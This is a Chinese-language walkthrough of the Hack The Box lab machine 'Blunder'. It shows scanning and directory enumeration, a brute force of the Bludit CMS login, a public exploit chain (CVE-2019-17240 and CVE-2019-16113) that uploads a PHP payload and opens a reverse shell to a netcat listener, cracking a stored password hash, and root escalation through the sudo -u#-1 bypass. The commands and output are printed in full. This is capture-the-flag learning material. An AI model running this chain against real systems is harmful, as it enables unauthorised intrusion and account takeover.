免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(rootkali)-[~/htb/Blunder]└─# nmap -sV -Pn 10.10.10.191 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 01:34 ESTNmap scan report for 10.10.10.191Host is up (0.30s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION21/tcp closed ftp80/tcp open http Apache httpd 2.4.41 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds21端口曾经被敞开了,只有80端口一个方向,先爆破看看。
爆破目录
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.191 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.191/_21-12-21_01-37-07.txtError Log: /root/dirsearch/logs/errors-21-12-21_01-37-07.logTarget: http://10.10.10.191/[01:37:09] Starting: [01:37:21] 200 - 7KB - /%3f/ [01:37:25] 400 - 304B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [01:37:45] 200 - 955B - /.github/ [01:37:46] 200 - 563B - /.gitignore [01:38:28] 200 - 7KB - /0 [01:38:55] 200 - 1KB - /LICENSE [01:39:00] 200 - 3KB - /README.md [01:39:59] 200 - 3KB - /about [01:40:23] 301 - 0B - /admin -> http://10.10.10.191/admin/ [01:40:32] 200 - 2KB - /admin/ [01:43:38] 400 - 304B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [01:45:44] 200 - 30B - /install.php [01:48:07] 200 - 22B - /robots.txt [01:48:16] 403 - 277B - /server-status/ [01:48:16] 403 - 277B - /server-status [01:49:19] 200 - 118B - /todo.txt 通常我会再用gobuster再爆破一次
└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -u http://10.10.10.191 -t 30 --no-error ===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.10.191[+] Method: GET[+] Threads: 30[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/12/21 01:51:39 Starting gobuster in directory enumeration mode===============================================================/.htpasswd (Status: 403) [Size: 277]/.git/logs/ (Status: 301) [Size: 0] [--> http://10.10.10.191/.git/logs]/.htaccess (Status: 403) [Size: 277] /.gitignore (Status: 200) [Size: 563] /.hta (Status: 403) [Size: 277] /0 (Status: 200) [Size: 7562] /LICENSE (Status: 200) [Size: 1083] /about (Status: 200) [Size: 3281] /admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/] /cgi-bin/ (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin] /robots.txt (Status: 200) [Size: 22] /server-status (Status: 403) [Size: 277] ===============================================================2021/12/21 01:53:33 Finished===============================================================联合两次爆破后果一一查看咱们感兴趣的文件和目录
README.md
ludit](https://www.bludit.com/)================================**Simple**, **Fast** and **Flexible** CMS.Bludit is a web application to build your own **website** or **blog** in seconds, it's completely **free and open source**. Bludit uses files in JSON format to store the content, you don't need to install or configure a database. You only need a web server with PHP support.Bludit is a **Flat-File** CMS.Bludit supports **Markdown** and **HTML code** for the content.- [Plugins](https://plugins.bludit.com)- [Themes](https://themes.bludit.com)- [Documentation](https://docs.bludit.com)- Help and Support [Forum](https://forum.bludit.org) and [Chat](https://gitter.im/bludit/support)失去cms名称:Bludit
todo.txt
-Update the CMS-Turn off FTP - DONE-Remove old users - DONE-Inform fergus that the new blog needs images - PENDINGftp确认是被作者敞开了。cms降级没有实现,暗示有破绽,fergus可能是一个用户名。
搜寻这个cms的利用代码
┌──(rootkali)-[~/htb/Blunder]└─# searchsploit Bludit---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass | php/webapps/48746.rbBludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rbBludit 3.9.12 - Directory Traversal | php/webapps/48568.pyBludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.pyBludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit) | php/webapps/49037.rbBludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txtbludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results存在一个暴力枚举破绽,把48942.py复制到本地,将fergus保留到user.txt
┌──(rootkali)-[~/htb/Blunder]└─# python3 48942.py -l http://10.10.10.191/admin/login.php -u ./user.txt -p /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX [◣] Brute Force: Testing -> fergus:123456[┘] Brute Force: Testing -> fergus:123456789[../.....] Brute Force: Testing -> fergus:picture1[.] Brute Force: Testing -> fergus:password[b] Brute Force: Testing -> fergus:12345678[←] Brute Force: Testing -> fergus:111111[┬] Brute Force: Testing -> fergus:123123[▖] Brute Force: Testing -> fergus:12345[◓] Brute Force: Testing -> fergus:1234567890[↙] Brute Force: Testing -> fergus:senha[o] Brute Force: Testing -> fergus:1234567[└] Brute Force: Testing -> fergus:qwerty[o] Brute Force: Testing -> fergus:abc123[┬] Brute Force: Testing -> fergus:Million2[├] Brute Force: Testing -> fergus:000000[ ] Brute Force: Testing -> fergus:1234[▁] Brute Force: Testing -> fergus:iloveyou[◑] Brute Force: Testing -> fergus:aaron431[\] Brute Force: Testing -> fergus:password1[┘] Brute Force: Testing -> fergus:qqww1122[↙] Brute Force: Testing -> fergus:123[p] Brute Force: Testing -> fergus:omgpop[◣] Brute Force: Testing -> fergus:123321[..\.....] Brute Force: Testing -> fergus:654321[-] Brute Force: Testing -> fergus:qwertyuiop[▆] Brute Force: Testing -> fergus:qwer123456[∧] Brute Force: Testing -> fergus:123456a[o] Brute Force: Testing -> fergus:a123456[◤] Brute Force: Testing -> fergus:666666[◣] Brute Force: Testing -> fergus:asdfghjkl[/] Brute Force: Testing -> fergus:ashley[▗] Brute Force: Testing -> fergus:987654321[▘] Brute Force: Testing -> fergus:RolandDeschain[*] SUCCESS !![+] Use Credential -> fergus:RolandDeschain拿到cms登录凭证:fergus:RolandDeschain
初始shell
依据搜寻的破绽信息,这个cms还存在一个上传破绽,然而kali上的payload须要用到msf,咱们并不想用这个工具
从msf里这个exp的版本号CVE-2019-16113,在github上找到了这个poc
依据poc的利用步骤,先把RolandDeschain保留在pass文件
开启一个监听
nc -lnvp 4242
执行poc
┌──(rootkali)-[~/htb/Blunder]└─# python3 poc.py _____ _ ______ _____ _____ | __ \ | | | ___ \/ __ \| ___| | | \/ ___| |_ | |_/ /| / \/| |__ | | __ / _ \ __| | / | | | __| | |_\ \ __/ |_ _| |\ \ | \__/\| |___ \____/\___|\__(_)_| \_| \____/\____/ This exploit combines CVE-2019-17240 & CVE-2019-16113 to gain remote shell on target. Created by: kisho64 (@h_a_m_i__) Enter target URL (i.e. https://target.com): http://10.10.10.191[ ~ ] Enter listener's IP: 10.10.14.3[ ~ ] Enter listener's port: 4242[...] Checking if the target is live...[ + ] The target is live! We are good to go...[ ~ ] Should I bruteforce username? [Y/N]: N[ ~ ] What username should I use? (leave this to use admin as username): fergus[ ~ ] Enter the location for password list: /root/htb/Blunder/pass[ * ] Tried: RolandDeschain[ + ] Creds found: fergus:RolandDeschain[...] Attempting to login now...[ + ] Login succeed... We are good to go :)[ + ] The payload mYTcGvAwRD.php has been uploaded...[ + ] The payload .htaccess has been uploaded...[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php拿到初始shell
┌──(rootkali)-[~/htb/Blunder]└─# nc -lnvp 4242listening on [any] 4242 ...connect to [10.10.14.3] from (UNKNOWN) [10.10.10.191] 46044bash: cannot set terminal process group (1279): Inappropriate ioctl for devicebash: no job control in this shellwww-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ 提权到hugo
user.txt在hugo用户下,咱们没有权限查看
在文件/var/www/bludit-3.10.0a/bl-content/databases/users.php找到hugo的md5明码:faca404fd5c0a31cf1897b823c695c85cffeb98d
www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php<r/www/bludit-3.10.0a/bl-content/databases/users.php <?php defined('BLUDIT') or die('Bludit CMS.'); ?>{ "admin": { "nickname": "Hugo", "firstName": "Hugo", "lastName": "", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": ""}}这里解进去当前是:Password120
提权到hugo的账号:
www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ su hugosu hugoPassword: Password120iduid=1001(hugo) gid=1001(hugo) groups=1001(hugo)whoamihugo提权
查看hugo特权信息
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -lsudo -lPassword: Password120Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser hugo may run the following commands on blunder: (ALL, !root) /bin/bash能够间接提权到root
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash<2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# ididuid=0(root) gid=1001(hugo) groups=1001(hugo)root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# whoamiwhoamiroot